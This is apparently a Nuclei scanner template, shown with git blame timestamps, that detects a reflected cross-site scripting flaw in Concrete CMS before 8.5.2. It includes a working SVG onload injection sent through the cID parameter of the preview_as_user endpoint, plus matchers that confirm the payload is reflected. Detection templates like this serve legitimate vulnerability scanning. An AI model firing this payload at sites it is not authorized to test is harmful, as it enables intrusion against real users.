nuclei-templates/vulnerabilities/concrete/concrete-xss.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-15 21:55:19 +00:00
id: concrete-xss
2022-08-14 13:18:48 +00:00
info:
name: Concrete CMS <8.5.2 - Cross-Site Scripting
2022-08-15 21:55:19 +00:00
author: shifacyclewla,hackergautam,djoevanka
severity: high
description: Concrete CMS before 8.5.2 contains a cross-site scripting vulnerability in preview_as_user function using cID parameter.
2022-08-14 13:18:48 +00:00
reference:
2022-08-15 21:55:19 +00:00
- https://hackerone.com/reports/643442
- https://github.com/concrete5/concrete5/pull/7999
2022-08-14 13:18:48 +00:00
- https://twitter.com/JacksonHHax/status/1389222207805661187
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: hackerone,concrete,xss,cms,unauth
2022-08-14 13:18:48 +00:00
requests:
- method: GET
path:
2022-08-15 21:55:19 +00:00
- '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
2022-08-14 13:18:48 +00:00
matchers-condition: and
matchers:
2022-08-15 21:55:19 +00:00
- type: word
part: body
2022-08-14 13:18:48 +00:00
words:
2022-08-15 21:55:19 +00:00
- '</iframe><svg/onload=alert("{{randstr}}")>'
2022-08-14 13:18:48 +00:00
2022-08-15 21:55:19 +00:00
- type: word
2022-08-14 13:18:48 +00:00
part: header
2022-08-15 21:55:19 +00:00
words:
- "text/html"
- "CONCRETE5"
condition: and
- type: status
2022-08-14 13:18:48 +00:00
status:
- 200
# Enhanced by mp on 2022/09/15